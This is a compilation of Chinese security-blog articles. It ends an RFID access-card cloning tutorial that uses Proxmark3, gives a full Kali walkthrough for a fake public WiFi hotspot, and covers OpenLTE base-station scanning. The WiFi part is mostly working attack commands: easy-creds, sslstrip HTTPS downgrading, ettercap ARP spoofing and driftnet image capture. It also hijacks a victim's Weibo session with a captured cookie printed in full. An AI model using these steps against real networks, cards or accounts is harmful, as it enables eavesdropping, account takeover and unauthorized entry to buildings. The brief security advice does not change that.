但是PM3并不能识别、使用二进制文件,我们还需要使用脚本将这个二进制文件转换成.eml格式的文本信息:

proxmark3> script run dumptoemul.lua 
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file 2CF0550B.eml

-----Finished
proxmark3> 

dumptoemul脚本成功将dumpdata.bin二进制文件转换成以卡片ID值命名的eml格式文件:

eml

我们来对比一下这两个文件:

cat

效果已经很明显了,脚本已经将乱码的二进制文件转换成了txt文本信息。

dumptoemul.lua脚本的功能也可以用Python语言来实现:bin2txet.py

#!/usr/bin/python
from __future__ import with_statement
import sys
import binascii

READ_BLOCKSIZE = 16

def main(argv):
    argc = len(argv)
    if argc < 3:
        print 'Usage:', argv[0], 'dumpdata.bin output.txt'
        sys.exit(1)

    with file(argv[1], "rb") as file_inp, file(argv[2], "w") as file_out:
        while True:
            byte_s = file_inp.read(READ_BLOCKSIZE)
            if not byte_s:
                break
            hex_char_repr = binascii.hexlify(byte_s)
            file_out.write(hex_char_repr)
            file_out.write("\n")

if __name__ == '__main__':
    main(sys.argv)

python bin2text.py dumpdata.bin output.txt
mv output.txt 2CF0550B.eml

清除仿真内存的各区块数据:

hf mf eclr 

把从卡片中导出的数据加载到PM3设备中:

proxmark3> hf mf eload 2CF0550B       
Loaded 64 blocks from file: 2CF0550B.eml  

使用PM3模拟门禁卡:

proxmark3> hf mf sim
 uid:N/A, numreads:0, flags:0 (0x00)           
#db# 4B UID: 2CF0550B              
proxmark3> 

这时我们可以使用PM3来实现通过门禁。另外一种方式:把从卡片导出的数据从PM3设备内存中克隆到白卡里,使用克隆卡片通过门禁

proxmark3> hf mf cload e         
Cant get block: 1

bingo

0x04 安全建议

目前我国80%的门禁产品均是采用原始IC卡的UID号或ID卡的ID号去做门禁卡,没有去进行加密认证或开发专用的密钥,其安全隐患远比Mifare卡的破解更危险,非法破解的人士只需采用专业的技术手段就可以完成破解过程。

门禁厂商、管理员:做好防护工作加强安全意识,尽量避免使用默认key、安全性低的key;对卡片和门禁读卡器使用身份认证&验证机制,绝对不能直接使用原始IC卡的UID号或ID卡的ID号去做门禁卡!

用户:妥善保管自己的门禁卡,避免信息泄露。
物联网IOT的高速发展,无线通信技术的应用也日趋广泛。本文仅通过门禁系统案例揭露NFC、RFID相关协议&技术存在的一些安全隐患。

我们现实生活中也有真实存在的案例:2010年北京一卡通被爆存在漏洞,可随意修改卡内余额,个人猜测这里很有可能是通过利用mifare卡片的PRNG漏洞来实现的。2014年,国外安全研究员发现台湾铁路、公交系统的悠游卡(EasyCard)同样存在PRNG漏洞,可修改卡片余额,并向悠游卡公司反馈报告了这一漏洞:

Clipboard Image.png

0x05 系列文章

RFID Hacking:看我如何突破门禁潜入FreeBuf大本营

RFID Hacking②:PM3入门指南

RFID Hacking③ ProxMark3使用案例:嗅探银行闪付卡信息

0x06 Refer

Mifare Classic 1k – cracker les clefs et lire le tag avec Proxmark3

offensive-security.com : Cloning RFID Tags with Proxmark 3

RadioWar : Proxmark3使用案例

DefCon 23 HOW TO TRAIN YOUR RFID HACKING TOOLS

backtrack-linux.org : RFID Cooking with Mifare Classic

BlackHat 2013 USA RFID Hacking Live Free or RFID Hard

*本文作者:雪碧0xroot@漏洞盒子安全团队,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)

http://www.freebuf.com/articles/wireless/109151.html

【实战】在Kali Linux中进行WIFI钓鱼 | How to create fake wifi hotspot with kali linux

 

Clipboard Image.png

0x00 实验环境

操作系统:Kali 1.0 (VM)

FackAP: easy-creds

硬件:NETGEAR wg111 v3 RTL8187B 网卡(kali下免驱)

Clipboard Image.png

靶机:安卓、iPhone设备

0x01 环境搭建

git clone https://github.com/brav0hax/easy-creds
cd easy-creds

Clipboard Image.png

bash install.sh

Clipboard Image.png

选择第一项:1.  Debian/Ubuntu and derivatives

Clipboard Image.png

这一步设定easy-creds的安装目录:/opt ,安装过程中会从国外网站下载一些依赖包以及第三方软件,这一过程中建议通过翻墙来节省时间。

当看到提示happy hunting的时候便意味着安装完成了:

Clipboard Image.png

0x02

根据上述步骤已将easy-creds安装到Kali中,我们可以在终端执行easy-creds运行,接下来我们需要对软件、系统参数进行一些修改:

2.1 修改etter uid、gid值 &开启iptables端口转发

kali中自带了中间人攻击的一些工具,如:ettercap,在第一次使用ettercap时,我们需要修改其默认配置文件/etc/ettercap/etter.conf: (有的系统中,ettercap的配置文件路径为:/etc/etter.conf)

Clipboard Image.png

需要我们把ettercap的ec_uid、ec_gid的值修改为0:

Clipboard Image.png

另外,如果系统使用了iptables防火墙,还需取消#后的注释使iptables配置生效,将:

# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

修改为:

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

2.2 开启数据包转发:

echo 1 >> /proc/sys/net/ipv4/ip_forward

2.3 配置iptables规则:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 

2.4 运行sslstrip

sslstrip -l 8080

2.5 开启网络管理 &重启网络管理服务

vim /etc/NetworkManager/NetworkManager.conf

Clipboard Image.png

将managed=false修改为managed=true:

Clipboard Image.png

重启网络管理服务:

service network-manager restart

0x03 运行easy-creds

终端执行:easy-creds
选择第三项:FakeAP Attacks

Clipboard Image.png

选择第一项:FakeAP Attack Static

Clipboard Image.png

y确定包含sidejacking劫持攻击:

Clipboard Image.png

下一步选择WIFI网络的流量入口:eth0

Clipboard Image.png

选择无线网络接口&设备:wlan0

Clipboard Image.png

设定WIFI-SSID:CMCC

Clipboard Image.png

WIFI网络信道:5

Clipboard Image.png

mon0

Clipboard Image.png

n

Clipboard Image.png

at0

Clipboard Image.png

n

Clipboard Image.png

为无线网络设置网段:192.168.88.0/24

Clipboard Image.png

设定DNS服务器:8.8.8.8

Clipboard Image.png

完成之后,easy-creds启动了Airbase-NG、DMESG、SSLStrip、Ettercap tunnel、URL snarf、Dsniff等工具:

Clipboard Image.png

红色部分显示安卓、iPhone靶机成功连入钓鱼WIFI环境,URL snarf也捕获到了两台设备正在访问的网站网址等信息。

0x04 Hacking for fun

4.1 “绵羊墙”

driftnet是一款简单而使用的图片捕获工具,能够捕获到网络数据包中的图片,同时支持抓取和显示音频文件,可用于捕获微信朋友圈中的相片、微博配图等等。

driftnet -i at0   (-i指定监听的网络接口)

Clipboard Image.png

4.2 MITM中间人攻击

Ettercap利用ARP欺骗,监听同一网段内某台主机甚至所有主机的网络通信流量,抓取其它主机通信流量中的Cookie等信息:

ettercap -i at0 -T -M arp:remote /192.168.88.1/ //  (通过ARP欺骗,监听192.168.88.0/24 网段所有主机通信流量)

Clipboard Image.png

Clipboard Image.png

4.3 利用Cookie登陆受害者账户

利用Cookie前,我们需要下载浏览器的一些Cookie相关的插件,如cookie manager、cookie editor。

这里我使用了:Modify Headers for Google Chrome

Clipboard Image.png

4.3.1 捕获到的微博Cookie数据:

Wed Jul 20 11:27:50 2016
TCP  192.168.88.100:50664 --> 180.149.139.248:80 | AP

GET /unread?t=1468985586846 HTTP/1.1.
Host: m.weibo.cn.
Connection: keep-alive.
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/13F69 UCBrowser/10.9.19.815 Mobile.
Cookie: H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U.
Accept: application/json, text/javascript, */*; q=0.01.
X-Requested-With: XMLHttpRequest.
Accept-Language: zh-cn.
Referer: http://m.weibo.cn/.
Accept-Encoding: gzip,deflate.
.

4.3.2 清空浏览器内weibo.cn的Cookie:

Clipboard Image.png

4.3.3 导入微博Cookie

选择右上角+ 增加Cookie:

Action=Modify 
Name=Cookie 
Value=H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U.

Clipboard Image.png

Clipboard Image.png

4.3.4 访问m.weibo.cn:

Clipboard Image.png

0x05 嗅探数据包&协议分析

5.1 wireshark

wireshark

5.2 tcpdump

tcpdump -i at0 -w sniffe.dump

5.3 ssltrips嗅探https加密流量

捕获HTTPS通信传输中的账号、密码:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
ssltrips -p -l 10000 -w log.txt

0x06 注意事项

1.easy-creds生成的日志文件过大,建议在/tmp目录中启动easy-creds(即使忘了删easy-creds日志,系统重启后自动清空/tmp目录)

2.如果连入钓鱼热点的设备不能联网了及时检查:/proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward

当发现值为0的时候需再次执行:

echo 1 >> /proc/sys/net/ipv4/ip_forward

3.easy-creds目前不兼容kali 2.0,所以不建议在kali 2.0 系统中安装easy-creds;

0x07 安全建议

1.不随便连陌生 WIFI,及时注销登录状态可使Cookie时效;

2.不使用WIFI时及时关闭手机WIFI,避免自动连入诸如CMCC这一类的公共开放无线热点。

0x08 refer

Ettercap Man In The MIddle Attack + SSL Strip

GnuRadio + BladeRF + OpenLTE 搭建4G LTE 基站 Part 1

本文作者:雪碧0xroot@漏洞盒子安全实验室

Clipboard Image.png

0x00 前言

在移动互联网大规模发展的背景下,智能手机的普及和各种互联网应用的流行,致使对无线网络的需求呈几何级增长,导致移动运营商之间的竞争愈发激烈。但由于资费下调等各种因素影响,运营商从用户获得的收益在慢慢减少,同时用于减少韵味和无线网络的升级投资不断增加,但收入却增长缓慢。为保证长期盈利增长,运营商必须节流。

SDR Software Define Radio 软件定义无线电可将基站信号处理功能尽量通过软件来实现,使用通用硬件平台可快速地实现信号的调制解调,编码运算,SDR为现有通信系统建设提供了全新思路,给技术研究开发降低了成本、并提供了更快的实现方式。(引用 基于开源SDR实现LTE系统对比 )

SDR是否能打破传统运营商在通信行业的垄断呢?

另外值得关注的是:国外安全大会上从数年前2G GSM攻击议题到近期的LTE 4G安全议题,基站通信安全一直备受安全爱好者关注。

Clipboard Image.png

在这一背景下,国外OpenLTE开源项目成为热门话题:

Clipboard Image.png

OpenLTE是在Linux系统下的使用GNURadio软件开发包实现的3GPP通信协议的一个开源项目,主要实现一个简单的4G基站的功能。在文章后面的内容中,我们将分享如何搭建、使用OpenLTE.

至于使用BladeRF搭建GSM基站的内容可阅读:

GSM BTS Hacking: 利用BladeRF和开源BTS 5搭建基站
GSM Hacking:使用BladeRF、树莓派、YatesBTS搭建便携式GSM基站
Demo:

IMG_0764.JPG

FreeBuf百科

2G网络是指第二代无线蜂窝电话通讯协议,是以无线通讯数字化为代表,能够进行窄带数据通讯。常见2G无线通讯协议有GSM频分多址(GPRS和EDGE和CDMA ) 传输速度很慢。

3G网络是第三代无线蜂窝电话通讯协议,主要是在2G的基础上发展了高带宽的数据通信,并提高了语音通话安全性。3G一般的数据通信带宽都在500Kb/s以上。目前3G常用的有3种标准:WCDMA、CDMA2000、TD-SCDMA,传速速度相对较快,可以很好的满足手机上网等需求。

4G网络是指第四代无线蜂窝电话通讯协议,该技术包括TD-LTE和FDD-LTE两种制式,是集3G与WLAN于一体并能够传输高质量视频图像以及图像传输质量与高清晰度电视不相上下的技术产品。 4G系统能够以100Mbps的速度下载,比拨号上网快2000倍,上传的速度也能达到20Mbps,并能够满足几乎所有用户对于无线服务的要求。

那么除去安全方面,2G、3G、4G之间有什么不同呢?对于用户而言,2G、3G、4G网络最大的区别在于传速速度不同。

给你一个秒懂的例子: 2G秒看苍老师.txt 3G秒看苍老师.jpg 4G秒看苍老师.avi:

Clipboard Image.png

0x01 环境搭建

OS:Ubuntu

GnuRadio 3.7

BladeRF

HackRF

1.1 BladeRF

1.1.1 驱动

mkdir bladeRF
wget -c https://github.com/Nuand/bladeRF/archive/master.zip
unzip master.zip
cd bladeRF-master
cd host
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_INSTALL_PREFIX=/usr/local -DINSTALL_UDEV_RULES=ON ../
make -j4
make install > install.log
ldconfig

1.1.2 BladeRF 固件

wget -c http://www.nuand.com/fx3/bladeRF_fw_v1.8.0.img
bladeRF-cli -f bladeRF_fw_v1.8.0.img -v verbose

1.2 GNURadio

mkdir gnuradio
cd gnurdio
wget http://www.sbrac.org/files/build-gnuradio
chmod a+x build-gnuradio
./build-gnuradio –v
sudo apt-get install libpolarssl-dev 

0x02 另辟蹊径

以上步骤所需依赖包较多,想偷懒的童鞋可以使用GnuRadio发布的Ubuntu LiveCD,里边已经搭建好了gnuradio、HackRF、BladeRF、USRP、gqrx、rtl-sdr等一些列SDR所需的依赖环境。使用这种方式可以避免安装系统环境中遇到的绝大多数坑。
下载链接:http://gnuradio.org/redmine/projects/gnuradio/wiki/GNURadioLiveDVD

gnuradio.png

2.1 编译OpenLTE (文件列表

wget http://ufpr.dl.sourceforge.net/project/openlte/openlte_v00-19-04.tgz  //(目前最新版)
tar zxvf openlte_v00-19-04.tgz
cd openlte_v00-19-04/
mkdir build
cd build
sudo cmake ../
sudo make
sudo make install

2make.png

0x03 搜索附近基站

插入SDR设备,这里我使用了BladeRF(测试了一下HackRF也能使用,但由于HackRF采用USB 2.0传输数据,其效率会比BladeRF低很多,有条件的同学可以使用USRP):

3bladerf.png

osmocom_fft --samp-rate 80000000

2D0363E3-BA32-4D0F-958F-3D31E1FCDC79.png

Clipboard Image.png

OpenLTE编译完成之后会在build目录下生成可执行文件:

Clipboard Image.png

cd LTE_fdd_dl_scan
./LTE_fdd_dl_scan

新建一终端,通过Telnet进入OpenLTE工作终端交互界面:

telnet 127.0.0.1 20000

4telnet.png

Clipboard Image.png

telnet端执行start开始扫描:

Clipboard Image.png

LTE_fdd_dl_scan将扫描dl_earfcn_list列表中的FCN值:从25到575

ARFCN:绝对无线频道编号 (Absolute Radio Frequency Channel Number – ARFCN ),是在GSM无线系统中,用来鉴别特殊射频通道的编号方案,相信嗅探过GSM短信的童鞋对它一点不陌生。4G LTE中ARFCN被称作EARFCN。

3.1 搜索电信FDD LTE网络:(telnet端)

write band 1
help
start

Clipboard Image.png

Clipboard Image.png

3.2 搜索联通FDD LTE网络:(telnet端)

stop
write band 3
start

openlte.png

3.3 关闭搜索:(telnet端)

shutdown

3.4 移动、联通、电信TD-LTE频段与FDD-LTE部分频段:

bands

0x04 结语

文章第一部分主要分享如何搭建OpenLTE并扫描附近基站信号,在后续的内容中将根据OpenLTE官方WIKI分享OpenLTE其他功能的使用。如LTE_fdd_enodeb的发卡,添加用户功能:

Clipboard Image.png

0x05 参考&感谢

Mobile Security: Practical attacks using cheap equipment

Black Hat:LTE and IMSI catcher

①:https://www.blackhat.com/docs/eu-15/materials/eu-15-Borgaonkar-LTE-And-IMSI-Catcher-Myths-wp.pdf

②:https://www.blackhat.com/docs/eu-15/materials/eu-15-Borgaonkar-LTE-And-IMSI-Catcher-Myths.pdf

IMSI Catchers and Mobile Security

黄琳_HITB Paper:LTE REDIRECTION Forcing T argeted LTE Cellphone into Unsafe Network
OpenLTE:sourceforge.net

OpenLTE WIKI

OpenLTE开源代码结构解析(一)

OpenLTE开源代码结构解析(二)

基于开源SDR实现LTE系统对比

* 作者:雪碧0xroot@漏洞盒子安全实验室,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

http://www.freebuf.com/articles/wireless/108417.html